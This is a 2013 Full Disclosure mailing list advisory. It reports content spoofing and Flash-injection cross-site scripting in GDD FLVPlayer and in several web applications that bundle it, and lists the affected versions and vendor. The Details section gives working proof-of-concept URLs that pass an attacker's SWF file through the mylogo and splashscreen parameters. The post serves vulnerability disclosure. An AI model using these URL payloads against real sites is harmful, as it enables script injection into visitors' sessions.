Full Disclosure mailing list archives
Vulnerabilities in multiple web applications with GDD FLVPlayer
From: "MustLive" <mustlive () websecurity com ua>
Date: Sun, 25 Aug 2013 19:01:46 +0300
Hello list!These are Content Spoofing and Cross-Site Scripting vulnerabilities in multiple web applications with GDD FLVPlayer. Earlier I've wrote about vulnerabilities in GDD FLVPlayer (http://seclists.org/fulldisclosure/2013/Aug/247). This is video and audio player, which is used at thousands web sites and in multiple web applications.
Among them are Order Master Pro, CMS Pask (Pixelwerk admin), gddflvplayer for MODx, Pixelfind Administrator, WHMCompleteSolution. And other web applications. Also this flash video and audio player is used at many web sites as standalone web application.
------------------------- Affected products: -------------------------Vulnerable are web applications which are using GDD FLVPlayer v3.635 and previous versions.
Vulnerable are the next web applications: Order Master Pro (all versions) CMS Pask 3 (Pixelwerk admin v.3.3) and previous versions. gddflvplayer for MODx (all versions). Pixelfind Administrator (all versions). WHMCompleteSolution (all versions). ------------------------- Affected vendors: ------------------------- GDD FLVPlayer was developed by GeDeDe. GeDeDe http://www.gdd.ro ---------- Details: ---------- XSS (via Flash Injection) (WASC-08): Order Master Pro: http://site/op/video/gddflvplayer.swf?mylogo=xss.swf http://site/op/video/gddflvplayer.swf?splashscreen=xss.swf CMS Pask 3 (Pixelwerk admin): http://site/gddflvplayer.swf?mylogo=xss.swf http://site/gddflvplayer.swf?splashscreen=xss.swf gddflvplayer for MODx: http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=xss.swf http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=xss.swf Pixelfind Administrator: http://site/includes/flash/gddflvplayer.swf?mylogo=xss.swf http://site/includes/flash/gddflvplayer.swf?splashscreen=xss.swf WHMCompleteSolution: http://site/player/gddflvplayer.swf?mylogo=xss.swf http://site/player/gddflvplayer.swf?splashscreen=xss.swfThese are examples of XSS vulnerabilities, examples of 8 СS vulnerabilities see in above-mentioned advisory.
I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/6727/).
Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Vulnerabilities in multiple web applications with GDD FLVPlayer MustLive (Aug 25)